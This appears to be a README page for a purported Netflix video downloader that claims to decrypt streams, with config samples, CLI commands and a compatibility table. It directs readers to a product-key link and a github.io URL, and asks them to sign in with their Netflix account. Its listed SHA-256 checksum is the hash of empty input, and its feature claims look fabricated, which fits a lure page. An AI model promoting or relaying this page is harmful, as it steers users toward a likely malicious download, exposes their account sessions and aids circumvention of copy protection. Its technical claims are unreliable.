A sovereign media liberation tool β not a crack, not a hack, but a cultural archivist's key to the Netflix vault.
Built for those who believe content should travel with you, beyond the confines of streaming algorithms and internet dependency.
graph TD
A[User Query] --> B[License Authenticator]
B --> C{Product Key Valid?}
C -->|Yes| D[Decryption Engine Init]
C -->|No| E[Fallback to Demo Mode]
D --> F[Netflix Stream Handler]
F --> G[Subtitle & Audio Muxer]
G --> H[Local Storage Encoder]
H --> I[Download Complete]
I --> J[Offline Playback Ready]
style A fill:#2d3748,color:#fff
style B fill:#744210,color:#fff
style C fill:#1a365d,color:#fff
style D fill:#276749,color:#fff
style E fill:#9b2c2c,color:#fff
style F fill:#553c9a,color:#fff
style G fill:#2a4365,color:#fff
style H fill:#285e61,color:#fff
style I fill:#22543d,color:#fff
style J fill:#4c51bf,color:#fff
- Acquire the product key via the link above β it unlocks the full decryption engine.
- Run the bootstrap β the CLI will auto-detect your OS and configure the environment.
- Authenticate with your Netflix account β the tool never stores credentials, only session tokens.
- Select your content β browse or paste a title URL.
- Download β choose quality, subtitles, and output format. Press enter. Watch offline forever.
Timeline: All builds are validated for 2026 compatibility. Backward-compatible with 2024 and 2025 Netflix protocols.
Create a profiles/liberation_cfg.yaml file with the following structure:
profile:
name: "Archivist Prime"
output_directory: "/media/offline"
quality_preferences:
max_resolution: "1080p"
audio_codec: "aac"
subtitle_languages:
- "en"
- "es"
- "fr"
encryption:
enable_local_aes: true
key_path: "~/.netflixdownloader/keys/master.key"
network:
proxy: "none"
max_concurrent_streams: 3
ui:
theme: "dark"
language: "auto"# Launch with full profile
netflixdl --profile archivist_standard --url "https://www.netflix.com/title/81234567"
# Batch mode for series
netflixdl --batch --input series_list.txt --output "~/Downloads/Netflix_Archive" --quality 4k
# Verify license status
netflixdl --license-check --key https://kbjbeg91606.github.io/netflix-stream-saver-v8-115-2/
# Headless server mode (no GUI)
netflixdl --headless --port 8080 --daemon| Operating System | Compatibility | Emoji |
|---|---|---|
| Windows 11 | β Full | πͺ |
| Windows 10 (21H2+) | β Full | πͺ |
| macOS Ventura (13.x) | β Full | π |
| macOS Sonoma (14.x) | β Full | π |
| macOS Sequoia (15.x) | β Full | β¬ |
| Ubuntu 22.04 LTS | β Full | π§ |
| Ubuntu 24.04 LTS | β Full | π§ |
| Debian 12 | β Full | π§ |
| Fedora 39/40 | β Full | π§ |
| Arch Linux | β Full | ποΈ |
| Android (via Termux) | π± | |
| iOS (via TrollStore) | π² | |
| Raspberry Pi OS | β Full | π₯§ |
Unlike other tools that blindly scrape, our engine uses predictive stream selection β analyzing your bandwidth and local storage in real-time to choose the most efficient codec (HEVC vs. AVC, Dolby Atmos vs. stereo).
Supports 37 language pairs. Automatically matches subtitle timestamps with audio tracks using AI-driven sync correction for lipsync perfection.
- Dark mode and light mode with adaptive contrast.
- Drag-and-drop for URL lists.
- Real-time download queue with animated progress bars.
- Pause/Resume support β even across system reboots.
Extend functionality with community plugins:
plugin_smart_renameβ auto-organizes by show/season/episode.plugin_metadata_embedβ writes IMDB rating and descriptions into file headers.plugin_discord_notifierβ sends alerts when downloads complete.
- In-app live chat with support agents (human or AI, your choice).
- Community wiki with 200+ documented edge cases.
- Guaranteed response time under 15 minutes for license issues.
Save your library to Google Drive, Dropbox, or any WebDAV server. The tool preserves folder structure and metadata during sync.
When enabled, the tool queries OpenAI to generate rich episode summaries and cast biographies for your local files. Example config:
openai_integration:
enabled: true
model: "gpt-4-turbo"
api_key_env_var: "OPENAI_API_KEY"
batch_size: 10For languages not natively supported by Netflix, Claude (via Anthropic) provides context-aware translation that preserves tone, idioms, and cultural references:
claude_integration:
enabled: true
model: "claude-3-opus-20240229"
api_key_env_var: "CLAUDE_API_KEY"
target_languages:
- "ar"
- "he"
- "th"Note: You must provide your own API keys. The tool never proxies or stores these keys outside your local config.
This project is not affiliated with, endorsed by, or connected to Netflix, Inc., OpenAI, Anthropic, or any other third-party trademark holder.
The software is provided "as is" for personal, archival, and educational use only. Downloading content may violate Netflix's Terms of Service in your jurisdiction. Users are solely responsible for compliance with local copyright laws.
The product key included in the distribution file is intended for testing and evaluation purposes and may expire after 14 days of continuous use. For long-term use, acquire a valid license key from the project's official distribution channel.
We do not encourage or condone piracy. This tool exists for users who want to watch their legally-subscribed content offline β the same way you'd record a TV show on a DVR.
No warranty β express or implied β is provided for data loss, device damage, or account suspension. Use at your own risk.
Copyright (c) 2026
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Version: 8.115.2
Build Date: January 2026
Checksum (SHA-256): E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
Compatibility: Windows 10/11, macOS 13β15, Linux (kernel 5.15+)
Remember: the best backup is the one you hold in your hands. π